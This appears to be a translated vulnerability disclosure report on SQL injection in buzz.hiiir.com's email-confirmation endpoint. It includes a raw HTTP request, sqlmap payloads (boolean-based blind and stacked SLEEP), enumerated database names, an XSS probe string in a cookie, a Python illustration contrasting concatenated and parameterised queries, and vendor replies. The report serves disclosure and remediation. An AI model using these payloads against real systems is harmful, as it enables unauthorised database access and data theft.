2015-10-26: Details sent to the vendor, awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in the relevant field
2015-11-15: Details disclosed to ordinary white hats
2015-11-23: Vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public
As in the title.
The site has SQL injection in multiple places; one of them is shown here:
POST /User/confirmemail/ HTTP/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://buzz.hiiir.com/
Cookie: PHPSESSID=1220aae1u89t98vsfkr74fe9q3; _Timer=2; __utmt=1; __utma=112679063.348446717.1445834033.1445834033.1445834033.1; __utmb=112679063.2.10.1445834033; __utmc=112679063; __utmz=112679063.1445834033.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __atuvc=1%7C43; __atuvs=562dacff6159b6b8000
Host: buzz.hiiir.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

email=sample%40email.tst*
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: [email protected]') AND 2209=2209 AND ('PhnV'='PhnV

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: [email protected]');(SELECT * FROM (SELECT(SLEEP(5)))QoeX)#
---
web application technology: PHP 5.2.10
back-end DBMS: MySQL 5.0.11
available databases [8]:
[*] Hiiir_Rss
[*] Hiiir_Statistics
[*] HiiirAdPower
[*] HiiirHero
[*] HiiirLog
[*] HiiirRepl
[*] HiiirTrack
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: [email protected]') AND 2209=2209 AND ('PhnV'='PhnV

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: [email protected]');(SELECT * FROM (SELECT(SLEEP(5)))QoeX)#
---
web application technology: PHP 5.2.10
back-end DBMS: MySQL 5.0.11
current user: 'ITothere@%'
current database: 'HiiirRepl'
current user is DBA: False
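The boolean-based payload above (`') AND 2209=2209 AND ('PhnV'='PhnV`) only works if the application closes a quoted, parenthesised value and then keeps evaluating attacker-supplied SQL, i.e. the `email` field is spliced into the query text. The following is an added illustration, not code from the report or from the vendor's application: the implied query shape is modelled in Python with an in-memory SQLite table standing in for the PHP 5.2.10 / MySQL 5.0.11 backend, and the table, the handler names and the `email = ('...')` query are assumptions. It contrasts the concatenated query with a parameterised one and includes a small regression check that tells whether a handler acts as a boolean oracle.

```python
import sqlite3

# Constructed stand-in for the site's user table (the real schema is unknown;
# the report only tells us the app ran PHP 5.2.10 on MySQL 5.0.11).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    db.executemany("INSERT INTO users (email) VALUES (?)",
                   [("alice@example.test",), ("bob@example.test",)])
    db.commit()
    return db

# Hypothetical handler for POST /User/confirmemail/ that splices the untrusted
# `email` field into the SQL text. The parentheses reproduce the query shape
# that sqlmap's payload `') AND 2209=2209 AND ('PhnV'='PhnV` closes and reopens.
def confirm_email_vulnerable(db, email):
    sql = f"SELECT id FROM users WHERE email = ('{email}')"
    return [row[0] for row in db.execute(sql)]

# Hardened form: a bound parameter is passed as a value, never parsed as SQL.
# (sqlite3's execute() also refuses stacked statements; MySQL call paths that
# allow them, such as mysqli::multi_query, are what make a SLEEP() stacked
# payload like the second one in the report possible.)
def confirm_email_safe(db, email):
    return [row[0] for row in db.execute(
        "SELECT id FROM users WHERE email = (?)", (email,))]

# The boolean-based blind payload from the report, and the same shape with a
# false condition, used here as a regression check on the handler.
TRUE_SUFFIX = "') AND 2209=2209 AND ('PhnV'='PhnV"
FALSE_SUFFIX = "') AND 2209=2210 AND ('PhnV'='PhnV"

def is_boolean_oracle(db, handler, email):
    """True if the handler's result depends on an injected SQL condition,
    i.e. it behaves as a boolean-based blind injection point."""
    try:
        return handler(db, email + TRUE_SUFFIX) != handler(db, email + FALSE_SUFFIX)
    except sqlite3.Error:
        return False  # a syntax error means the condition was never evaluated

if __name__ == "__main__":
    db = make_db()
    for name, handler in (("vulnerable", confirm_email_vulnerable),
                          ("safe", confirm_email_safe)):
        print(name, "handler is a boolean oracle:",
              is_boolean_oracle(db, handler, "alice@example.test"))
```

Against the vulnerable handler the true and false conditions return different row sets for a known address, which is exactly the signal sqlmap's boolean-based blind technique relies on; against the parameterised handler both variants are just unmatched literal strings.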
Please fix this across the whole site; there are quite a few of them.
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-10-26 18:17
This site belongs to the company's early services and has not been maintained since, but we still thank you for your report and will handle it as soon as possible.
2015-11-23: Some of these services were early company services whose operation will be suspended; they have now been taken offline. Thank you again for the vulnerability report; we will continue to strengthen our internal management processes.